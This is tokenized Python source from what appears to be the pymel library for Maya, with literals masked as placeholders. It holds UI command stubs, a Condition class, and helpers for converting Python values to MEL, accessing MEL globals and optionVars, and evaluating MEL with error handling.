<EOL> def floatSlider2 ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def lsUI ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def windowPref ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def optionMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showsHourglass ( func ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dimWhen ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tabLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def button ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorEditor ( * args , 
** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def folderButtonGrp ( name = None , * args , ** kwargs ) : <EOL> pass <EOL> def image ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudSliderButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptedPanelType ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def outlinerEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def pathButtonGrp ( name = None , * args , ** kwargs ) : <EOL> pass <EOL> def attrEnumOptionMenuGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrNavigationControlGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def deviceEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeTreeLister ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def headsUpDisplay ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def informBox ( title , message , ok = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def loadUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def autoLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def deleteUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def viewManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def outlinerPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showSelectionInTitle ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatScrollBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def paneLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def verticalLayout ( * args , ** kwargs ) : <EOL> pass <EOL> 
def hotkeyCheck ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def vectorFieldGrp ( * args , ** kwargs ) : <EOL> pass <EOL> def grabColor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptedPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def control ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layoutDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def savePrefObjects ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def connectControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def treeView ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptBox ( title , message , okText , cancelText , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setFocus ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptEditorInfo ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveAllShelves ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setParent ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def createEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def headsUpMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def exclusiveLightCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def blendShapePanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def componentBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fileDialog ( * args , ** kwargs ) : <EOL> pass <EOL> def buttonManip ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass 
<EOL> def columnLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def switchTable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def popupMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkBoxGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def glRenderEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def currentMenuParent ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def spreadSheetEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def canvas ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def timeControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def horizontalLayout ( * args , ** kwargs ) : <EOL> pass <EOL> def artBuildPaintMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> _logger = None <EOL> melGlobals = { } <EOL> thisModuleCmd = "<STR_LIT>" <EOL> scriptTableCmds = { } <EOL> mel = None <EOL> _commandsToUITypes = { } </s>
<s> """<STR_LIT>""" <EOL> class Condition ( object ) : <EOL> """<STR_LIT>""" <EOL> def __and__ ( self , other ) : <EOL> pass <EOL> def __init__ ( self , value = None ) : <EOL> pass <EOL> def __invert__ ( self ) : <EOL> pass <EOL> def __nonzero__ ( self ) : <EOL> pass <EOL> def __or__ ( self , other ) : <EOL> pass <EOL> def __rand__ ( self , other ) : <EOL> pass <EOL> def __ror__ ( self , other ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> NO_DATA = None <EOL> class AndOrAbstract ( Condition ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> class Inverse ( Condition ) : <EOL> def __init__ ( self , toInvert ) : <EOL> pass <EOL> def __str__ ( self ) : <EOL> pass <EOL> def eval ( self , data = "<STR_LIT>" ) : <EOL> pass <EOL> class Or ( AndOrAbstract ) : <EOL> pass <EOL> class And ( AndOrAbstract ) : <EOL> pass <EOL> Always = Condition ( ) <EOL> Never = Condition ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os , inspect <EOL> from getpass import getuser as _getuser <EOL> import system <EOL> import maya . mel as _mm <EOL> import maya . cmds as _mc <EOL> import pymel . util as util <EOL> import pymel . internal . pmcmds as cmds <EOL> import pymel . internal . factories as _factories <EOL> import pymel . internal . cmdcache as _cmdcache <EOL> import pymel . api as _api <EOL> import datatypes <EOL> MELTYPES = [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:int>' , '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def isValidMelType ( typStr ) : <EOL> """<STR_LIT>""" <EOL> return typStr in MELTYPES <EOL> def _flatten ( iterables ) : <EOL> for it in iterables : <EOL> if util . isIterable ( it ) : <EOL> for element in it : <EOL> yield element <EOL> else : <EOL> yield it <EOL> def pythonToMel ( arg ) : <EOL> """<STR_LIT>""" <EOL> if arg is None : <EOL> return '<STR_LIT>' <EOL> if arg is True or arg is False : <EOL> return str ( arg ) . lower ( ) <EOL> if util . isNumeric ( arg ) : <EOL> return str ( arg ) <EOL> if isinstance ( arg , datatypes . Vector ) : <EOL> return '<STR_LIT>' % ( arg [ <NUM_LIT:0> ] , arg [ <NUM_LIT:1> ] , arg [ <NUM_LIT:2> ] ) <EOL> if util . isIterable ( arg ) : <EOL> if util . isMapping ( arg ) : <EOL> arg = list ( _flatten ( arg . iteritems ( ) ) ) <EOL> else : <EOL> arg = list ( _flatten ( arg ) ) <EOL> forceString = False <EOL> for each in arg : <EOL> if not util . isNumeric ( each ) : <EOL> forceString = True <EOL> break <EOL> if forceString : <EOL> newargs = [ '<STR_LIT>' % x for x in arg ] <EOL> else : <EOL> newargs = [ str ( x ) for x in arg ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( newargs ) <EOL> return '<STR_LIT>' % cmds . encodeString ( str ( arg ) ) <EOL> def pythonToMelCmd ( command , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> strArgs = [ pythonToMel ( arg ) for arg in args ] <EOL> if kwargs : <EOL> strFlags = [ ] <EOL> if command in _factories . 
cmdlist : <EOL> flags = _factories . cmdlist [ command ] [ '<STR_LIT>' ] <EOL> shortFlags = _factories . cmdlist [ command ] [ '<STR_LIT>' ] <EOL> else : <EOL> flags = { } <EOL> shortFlags = { } <EOL> for key , val in kwargs . iteritems ( ) : <EOL> flagInfo = None <EOL> if key in flags : <EOL> flagInfo = flags [ key ] <EOL> elif key in shortFlags : <EOL> flagInfo = flags [ shortFlags [ key ] ] <EOL> if ( flagInfo and flagInfo . get ( '<STR_LIT:args>' ) == bool <EOL> and flagInfo . get ( '<STR_LIT>' ) == <NUM_LIT:0> ) : <EOL> strFlags . append ( '<STR_LIT>' % key ) <EOL> elif ( isinstance ( val , ( tuple , list ) ) <EOL> and len ( val ) == flagInfo . get ( '<STR_LIT>' ) ) : <EOL> strFlags . append ( '<STR_LIT>' % ( key , '<STR_LIT:U+0020>' . join ( pythonToMel ( x ) for x in val ) ) ) <EOL> else : <EOL> strFlags . append ( '<STR_LIT>' % ( key , pythonToMel ( val ) ) ) <EOL> cmdStr = '<STR_LIT>' % ( command , '<STR_LIT:U+0020>' . join ( strFlags ) , '<STR_LIT:U+0020>' . join ( strArgs ) ) <EOL> else : <EOL> cmdStr = '<STR_LIT>' % ( command , '<STR_LIT:U+002C>' . join ( strArgs ) ) <EOL> return cmdStr <EOL> def getMelType ( pyObj , exactOnly = True , allowBool = False , allowMatrix = False ) : <EOL> """<STR_LIT>""" <EOL> if inspect . isclass ( pyObj ) : <EOL> if issubclass ( pyObj , basestring ) : return '<STR_LIT:string>' <EOL> elif allowBool and issubclass ( pyObj , bool ) : return '<STR_LIT:bool>' <EOL> elif issubclass ( pyObj , int ) : return '<STR_LIT:int>' <EOL> elif issubclass ( pyObj , float ) : return '<STR_LIT:float>' <EOL> elif issubclass ( pyObj , datatypes . VectorN ) : return '<STR_LIT>' <EOL> elif issubclass ( pyObj , datatypes . MatrixN ) : <EOL> if allowMatrix : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif not exactOnly : <EOL> return pyObj . __name__ <EOL> else : <EOL> if isinstance ( pyObj , datatypes . VectorN ) : return '<STR_LIT>' <EOL> elif isinstance ( pyObj , datatypes . 
MatrixN ) : <EOL> if allowMatrix : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif util . isIterable ( pyObj ) : <EOL> try : <EOL> return getMelType ( pyObj [ <NUM_LIT:0> ] , exactOnly = True ) + '<STR_LIT>' <EOL> except IndexError : <EOL> return '<STR_LIT>' <EOL> except : <EOL> return <EOL> if isinstance ( pyObj , basestring ) : return '<STR_LIT:string>' <EOL> elif allowBool and isinstance ( pyObj , bool ) : return '<STR_LIT:bool>' <EOL> elif isinstance ( pyObj , int ) : return '<STR_LIT:int>' <EOL> elif isinstance ( pyObj , float ) : return '<STR_LIT:float>' <EOL> elif not exactOnly : <EOL> return type ( pyObj ) . __name__ <EOL> class MelGlobals ( dict ) : <EOL> """<STR_LIT>""" <EOL> melTypeToPythonType = { <EOL> '<STR_LIT:string>' : str , <EOL> '<STR_LIT:int>' : int , <EOL> '<STR_LIT:float>' : float , <EOL> '<STR_LIT>' : datatypes . Vector <EOL> } <EOL> class MelGlobalArray ( util . defaultlist ) : <EOL> def __init__ ( self , type , variable , * args , ** kwargs ) : <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> type = type [ : - <NUM_LIT:2> ] <EOL> pyType = MelGlobals . melTypeToPythonType [ type ] <EOL> util . defaultlist . __init__ ( self , pyType , * args , ** kwargs ) <EOL> declaration = MelGlobals . _get_decl_statement ( type , variable ) <EOL> self . _setItemCmd = "<STR_LIT>" % ( declaration , variable ) <EOL> self . _setItemCmd += '<STR_LIT>' <EOL> def __setitem__ ( self , index , value ) : <EOL> _mm . eval ( self . _setItemCmd % ( index , pythonToMel ( value ) ) ) <EOL> super ( MelGlobalArray , self ) . __setitem__ ( index , value ) <EOL> setItem = __setitem__ <EOL> def append ( self , val ) : raise AttributeError <EOL> def extend ( self , val ) : raise AttributeError <EOL> typeMap = { } <EOL> VALID_TYPES = MELTYPES <EOL> def __getitem__ ( self , variable ) : <EOL> return self . __class__ . get ( variable ) <EOL> def __setitem__ ( self , variable , value ) : <EOL> return self . __class__ . 
set ( variable , value ) <EOL> @ classmethod <EOL> def _formatVariable ( cls , variable ) : <EOL> if not variable . startswith ( '<STR_LIT:$>' ) : <EOL> variable = '<STR_LIT:$>' + variable <EOL> if variable . endswith ( '<STR_LIT>' ) : <EOL> variable = variable [ : - <NUM_LIT:2> ] <EOL> return variable <EOL> @ classmethod <EOL> def getType ( cls , variable ) : <EOL> variable = cls . _formatVariable ( variable ) <EOL> info = mel . whatIs ( variable ) . split ( ) <EOL> if len ( info ) == <NUM_LIT:2> and info [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> MelGlobals . typeMap [ variable ] = info [ <NUM_LIT:0> ] <EOL> return info [ <NUM_LIT:0> ] <EOL> raise TypeError , "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_decl_statement ( cls , type , variable ) : <EOL> decl_name = cls . _formatVariable ( variable ) <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> type = type [ : - <NUM_LIT:2> ] <EOL> decl_name += '<STR_LIT>' <EOL> return "<STR_LIT>" % ( type , decl_name ) <EOL> @ classmethod <EOL> def initVar ( cls , type , variable ) : <EOL> if type not in MELTYPES : <EOL> raise TypeError , "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( [ "<STR_LIT>" % x for x in MELTYPES ] ) <EOL> variable = cls . _formatVariable ( variable ) <EOL> _mm . eval ( cls . _get_decl_statement ( type , variable ) ) <EOL> MelGlobals . typeMap [ variable ] = type <EOL> return variable <EOL> @ classmethod <EOL> def get ( cls , variable , type = None ) : <EOL> """<STR_LIT>""" <EOL> variable = cls . _formatVariable ( variable ) <EOL> if type is None : <EOL> try : <EOL> type = MelGlobals . typeMap [ variable ] <EOL> except KeyError : <EOL> try : <EOL> type = cls . getType ( variable ) <EOL> except TypeError : <EOL> raise KeyError , variable <EOL> variable = cls . initVar ( type , variable ) <EOL> if type . endswith ( '<STR_LIT>' ) : <EOL> array = True <EOL> proc_name = '<STR_LIT>' + type . 
replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> array = False <EOL> proc_name = '<STR_LIT>' + type <EOL> declaration = cls . _get_decl_statement ( type , variable ) <EOL> cmd = "<STR_LIT>" % ( type , proc_name , declaration , variable , proc_name ) <EOL> res = _mm . eval ( cmd ) <EOL> if array : <EOL> return MelGlobals . MelGlobalArray ( type , variable , res ) <EOL> else : <EOL> return MelGlobals . melTypeToPythonType [ type ] ( res ) <EOL> @ classmethod <EOL> def set ( cls , variable , value , type = None ) : <EOL> """<STR_LIT>""" <EOL> variable = cls . _formatVariable ( variable ) <EOL> if type is None : <EOL> try : <EOL> type = MelGlobals . typeMap [ variable ] <EOL> except KeyError : <EOL> type = cls . getType ( variable ) <EOL> variable = cls . initVar ( type , variable ) <EOL> declaration = cls . _get_decl_statement ( type , variable ) <EOL> cmd = "<STR_LIT>" % ( declaration , variable , pythonToMel ( value ) ) <EOL> _mm . eval ( cmd ) <EOL> @ classmethod <EOL> def keys ( cls ) : <EOL> """<STR_LIT>""" <EOL> return mel . env ( ) <EOL> melGlobals = MelGlobals ( ) <EOL> def getMelGlobal ( type , variable ) : <EOL> return melGlobals . get ( variable , type ) <EOL> def setMelGlobal ( type , variable , value ) : <EOL> return melGlobals . set ( variable , value , type ) <EOL> class Catch ( object ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> success = None <EOL> def __call__ ( self , func , * args , ** kwargs ) : <EOL> try : <EOL> Catch . result = func ( * args , ** kwargs ) <EOL> Catch . success = True <EOL> return <NUM_LIT:0> <EOL> except : <EOL> Catch . success = False <EOL> return <NUM_LIT:1> <EOL> def reset ( self ) : <EOL> Catch . result = None <EOL> Catch . success = None <EOL> catch = Catch ( ) <EOL> class OptionVarList ( tuple ) : <EOL> def __new__ ( cls , val , key ) : <EOL> self = tuple . __new__ ( cls , val ) <EOL> return self <EOL> def __init__ ( self , val , key ) : <EOL> self . 
key = key <EOL> def __setitem__ ( self , key , val ) : <EOL> raise TypeError , '<STR_LIT>' % self . __class__ . __name__ <EOL> def appendVar ( self , val ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( val , basestring ) : <EOL> return cmds . optionVar ( stringValueAppend = [ self . key , val ] ) <EOL> if isinstance ( val , int ) : <EOL> return cmds . optionVar ( intValueAppend = [ self . key , val ] ) <EOL> if isinstance ( val , float ) : <EOL> return cmds . optionVar ( floatValueAppend = [ self . key , val ] ) <EOL> raise TypeError , '<STR_LIT>' <EOL> append = appendVar <EOL> class OptionVarDict ( object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return cmds . optionVar ( * args , ** kwargs ) <EOL> def __contains__ ( self , key ) : <EOL> return self . has_key ( key ) <EOL> def has_key ( self , key ) : <EOL> return bool ( cmds . optionVar ( exists = key ) ) <EOL> def __getitem__ ( self , key ) : <EOL> if not self . has_key ( key ) : <EOL> raise KeyError , key <EOL> val = cmds . optionVar ( q = key ) <EOL> if isinstance ( val , list ) : <EOL> val = OptionVarList ( val , key ) <EOL> return val <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __setitem__ ( self , key , val ) : <EOL> if isinstance ( val , basestring ) : <EOL> return cmds . optionVar ( stringValue = [ key , val ] ) <EOL> if isinstance ( val , ( int , bool ) ) : <EOL> return cmds . optionVar ( intValue = [ key , int ( val ) ] ) <EOL> if isinstance ( val , float ) : <EOL> return cmds . optionVar ( floatValue = [ key , val ] ) <EOL> if isinstance ( val , ( list , tuple ) ) : <EOL> if len ( val ) == <NUM_LIT:0> : <EOL> return cmds . 
# NOTE(review): this chunk is token-anonymized (string/number literals masked as
# <STR_LIT>/<NUM_LIT> placeholders) and begins mid-definition: the statements up
# to `def keys` continue the body of OptionVarDict.__setitem__ whose `def` line
# (and the enclosing class header) lie before this chunk.  Comments below only
# state what the visible code does; masked literals are not guessed at.

# --- continuation of OptionVarDict.__setitem__ (list-valued optionVar case) ---
# Clears any existing array value for `key`, then picks the cmds.optionVar flag
# matching the element type of `val` (string / int / float), writes the first
# element, and appends the rest with the "append" variant of the flag.
optionVar(clearArray=key)
listType = type(val[<NUM_LIT:0>])
if issubclass(listType, basestring):
    flag = '<STR_LIT>'
elif issubclass(listType, int):
    flag = '<STR_LIT>'
elif issubclass(listType, float):
    flag = '<STR_LIT>'
else:
    # Only string/int/float element types are representable as optionVars.
    raise TypeError, ('<STR_LIT>' % listType)
# Write the first element, then switch to the append form of the flag for the rest.
cmds.optionVar(**{flag: [key, val[<NUM_LIT:0>]]})
flag += "<STR_LIT>"
for elem in val[<NUM_LIT:1>:]:
    if not isinstance(elem, listType):
        # Heterogeneous lists cannot be stored under a single typed flag.
        raise TypeError, '<STR_LIT>'
    cmds.optionVar(**{flag: [key, elem]})

# --- remaining OptionVarDict methods (dict-like facade over Maya optionVars) ---

def keys(self):
    # All optionVar names currently defined in Maya.
    return cmds.optionVar(list=True)

def values(self):
    # Materializes every stored value via __getitem__.
    return [self[key] for key in self.keys()]

def pop(self, key):
    # Query-then-remove; returns the value that was stored under `key`.
    val = cmds.optionVar(q=key)
    cmds.optionVar(remove=key)
    return val

def __delitem__(self, key):
    # Deletion discards the popped value.
    self.pop(key)

def iterkeys(self):
    for key in self.keys():
        yield key
# Iterating the dict iterates its keys, matching dict semantics.
__iter__ = iterkeys

def itervalues(self):
    for key in self.keys():
        yield self[key]

def iteritems(self):
    for key in self.keys():
        yield key, self[key]

# Module-level singleton instance of the optionVar facade.
optionVar = OptionVarDict()


class Env(object):
    """<STR_LIT>"""
    # Convenience accessors for Maya session/global state (construction history,
    # up axis, time/playback ranges).  Thin wrappers around cmds.* queries.
    optionVars = OptionVarDict()
    envVars = os.environ

    def setConstructionHistory(self, state):
        cmds.constructionHistory(tgl=state)

    def getConstructionHistory(self):
        return cmds.constructionHistory(q=True, tgl=True)

    def sceneName(self):
        # Wraps the current scene path in the project's Path type.
        return system.Path(cmds.file(q=<NUM_LIT:1>, sn=<NUM_LIT:1>))

    def setUpAxis(self, axis, rotateView=False):
        """<STR_LIT>"""
        cmds.upAxis(axis=axis, rotateView=rotateView)

    def getUpAxis(self):
        """<STR_LIT>"""
        return cmds.upAxis(q=True, axis=True)

    def user(self):
        return _getuser()

    def host(self):
        return _gethostname()

    # Each get/set pair below is also exposed as a property for attribute-style
    # access (env.time, env.minTime, ...).
    def getTime(self):
        return cmds.currentTime(q=<NUM_LIT:1>)

    def setTime(self, val):
        cmds.currentTime(val)
    time = property(getTime, setTime)

    def getMinTime(self):
        return cmds.playbackOptions(q=<NUM_LIT:1>, minTime=<NUM_LIT:1>)

    def setMinTime(self, val):
        cmds.playbackOptions(minTime=val)
    minTime = property(getMinTime, setMinTime)

    def getMaxTime(self):
        return cmds.playbackOptions(q=<NUM_LIT:1>, maxTime=<NUM_LIT:1>)

    def setMaxTime(self, val):
        cmds.playbackOptions(maxTime=val)
    maxTime = property(getMaxTime, setMaxTime)

    def getAnimStartTime(self):
        return cmds.playbackOptions(q=<NUM_LIT:1>, animationStartTime=<NUM_LIT:1>)

    def setAnimStartTime(self, val):
        cmds.playbackOptions(animationStartTime=val)
    animStartTime = property(getAnimStartTime, setAnimStartTime)

    def getAnimEndTime(self):
        return cmds.playbackOptions(q=<NUM_LIT:1>, animationEndTime=<NUM_LIT:1>)

    def setAnimEndTime(self, val):
        cmds.playbackOptions(animationEndTime=val)
    animEndTime = property(getAnimEndTime, setAnimEndTime)

# Module-level singleton for environment access.
env = Env()


# Exception hierarchy for MEL evaluation failures.  Each subclass mixes the
# shared MelError base with the closest built-in exception so callers can catch
# either family.
class MelError(RuntimeError):
    """<STR_LIT>"""
    pass

class MelConversionError(MelError, TypeError):
    """<STR_LIT>"""
    pass

class MelUnknownProcedureError(MelError, NameError):
    """<STR_LIT>"""
    pass

class MelArgumentError(MelError, TypeError):
    """<STR_LIT>"""
    pass

class MelSyntaxError(MelError, SyntaxError):
    """<STR_LIT>"""
    pass


class Mel(object):
    """<STR_LIT>"""
    # Name of the MEL procedure currently being dispatched via attribute access;
    # used by eval() to enrich error messages.  None when eval() is called directly.
    proc = None

    def __getattr__(self, command):
        # Dunder-looking names are resolved from the instance dict only, so that
        # protocol probes (e.g. copy/pickle) don't get a MEL dispatcher back.
        if command.startswith('<STR_LIT>') and command.endswith('<STR_LIT>'):
            try:
                return self.__dict__[command]
            except KeyError:
                raise AttributeError, "<STR_LIT>" % command

        def _call(*args, **kwargs):
            # Build a MEL command string from the python call and evaluate it,
            # recording the procedure name for error reporting.
            cmd = pythonToMelCmd(command, *args, **kwargs)
            try:
                self.__class__.proc = command
                return self.eval(cmd)
            finally:
                self.__class__.proc = None
        return _call

    @classmethod
    def mprint(cls, *args):
        """<STR_LIT>"""
        _mm.eval(r"""<STR_LIT>""" % pythonToMel('<STR_LIT:U+0020>'.join(map(str, args))) + '<STR_LIT:\n>')

    @classmethod
    def source(cls, script, language='<STR_LIT>'):
        """<STR_LIT>"""
        # Dispatches on `language`: one branch sources via MEL eval, the other
        # imports a python module by file path (masked literals hide which is which).
        if language == '<STR_LIT>':
            cls.eval("""<STR_LIT>""" % script)
        elif language == '<STR_LIT>':
            script = util.path(script)
            modulePath = script.namebase
            folder = script.parent  # NOTE(review): assigned but unused in this branch
            print modulePath
            if not sys.modules.has_key(modulePath):
                print "<STR_LIT>"
                module = __import__(modulePath, globals(), locals(), ['<STR_LIT>'])
                sys.modules[modulePath] = module
        else:
            raise TypeError, "<STR_LIT>" % language

    @classmethod
    def eval(cls, cmd):
        """<STR_LIT>"""
        # Evaluate `cmd` through the Maya API, capturing error output via a
        # command-output callback so failures can be re-raised as the most
        # specific Mel*Error subclass.  The callback and commandEcho state are
        # restored on both the success and failure paths.
        undoState = _mc.undoInfo(q=<NUM_LIT:1>, state=<NUM_LIT:1>)
        lineNumbers = _mc.commandEcho(q=<NUM_LIT:1>, lineNumbers=<NUM_LIT:1>)
        _mc.commandEcho(lineNumbers=<NUM_LIT:1>)
        global errors
        errors = []

        def errorCallback(nativeMsg, messageType, data):
            # Collect only genuine error messages emitted during execution.
            global errors
            if messageType == _api.MCommandMessage.kError:
                if nativeMsg:
                    errors += [nativeMsg]

        id = _api.MCommandMessage.addCommandOutputCallback(errorCallback, None)
        try:
            res = _api.MCommandResult()
            _api.MGlobal.executeCommand(cmd, res, False, undoState)
        except Exception:
            # Failure path: tear down the callback/echo state, then classify the
            # captured messages into a specific exception type by substring match.
            _api.MMessage.removeCallback(id)
            _mc.commandEcho(lineNumbers=lineNumbers)
            if hasattr(id, '<STR_LIT>'):
                # SWIG-wrapped callback ids must be disowned to avoid a crash on GC.
                # TODO(review): confirm — masked attribute name presumed to be 'disown'.
                id.disown()
            msg = '<STR_LIT:\n>'.join(errors)
            if '<STR_LIT>' in msg:
                e = MelUnknownProcedureError
            elif '<STR_LIT>' in msg:
                e = MelArgumentError
                if cls.proc:
                    # Drop the first line of the message when we know the proc name.
                    msg = msg.split('<STR_LIT:\n>', <NUM_LIT:1>)[<NUM_LIT:1>].lstrip()
            elif '<STR_LIT>' in msg or '<STR_LIT>' in msg:
                e = MelConversionError
            elif '<STR_LIT>' in msg:
                e = MelSyntaxError
            else:
                e = MelError
            message = "<STR_LIT>" % (msg)
            # Indent the failing command for readability in the exception text.
            fmtCmd = '<STR_LIT:\n>'.join(['<STR_LIT:U+0020>' + x for x in cmd.split('<STR_LIT:\n>')])
            if cls.proc:
                if e is not MelUnknownProcedureError:
                    # Look up where the failing procedure was defined, resolving
                    # a prefixed path form via os.path.realpath.
                    file = _mm.eval('<STR_LIT>' % cls.proc)
                    if file.startswith('<STR_LIT>'):
                        file = '<STR_LIT>' % os.path.realpath(file.split('<STR_LIT::>')[<NUM_LIT:1>].lstrip())
                    message += '<STR_LIT>' % (cls.proc, file)
                message += '<STR_LIT:\n>' + fmtCmd
            else:
                message += '<STR_LIT>' % fmtCmd
            raise e, message
        else:
            # Success path: same teardown, then unmarshal the MCommandResult into
            # native python / pymel datatypes by result-type tag.
            _api.MMessage.removeCallback(id)
            _mc.commandEcho(lineNumbers=lineNumbers)
            if hasattr(id, '<STR_LIT>'):
                id.disown()
            resType = res.resultType()
            if resType == _api.MCommandResult.kInvalid:
                return
            elif resType == _api.MCommandResult.kInt:
                result = _api.SafeApiPtr('<STR_LIT:int>')
                res.getResult(result())
                return result.get()
            elif resType == _api.MCommandResult.kIntArray:
                result = _api.MIntArray()
                res.getResult(result)
                return [result[i] for i in range(result.length())]
            elif resType == _api.MCommandResult.kDouble:
                result = _api.SafeApiPtr('<STR_LIT>')
                res.getResult(result())
                return result.get()
            elif resType == _api.MCommandResult.kDoubleArray:
                result = _api.MDoubleArray()
                res.getResult(result)
                return [result[i] for i in range(result.length())]
            elif resType == _api.MCommandResult.kString:
                return res.stringResult()
            elif resType == _api.MCommandResult.kStringArray:
                result = []
                res.getResult(result)
                return result
            elif resType == _api.MCommandResult.kVector:
                result = _api.MVector()
                res.getResult(result)
                return datatypes.Vector(result)
            elif resType == _api.MCommandResult.kVectorArray:
                result = _api.MVectorArray()
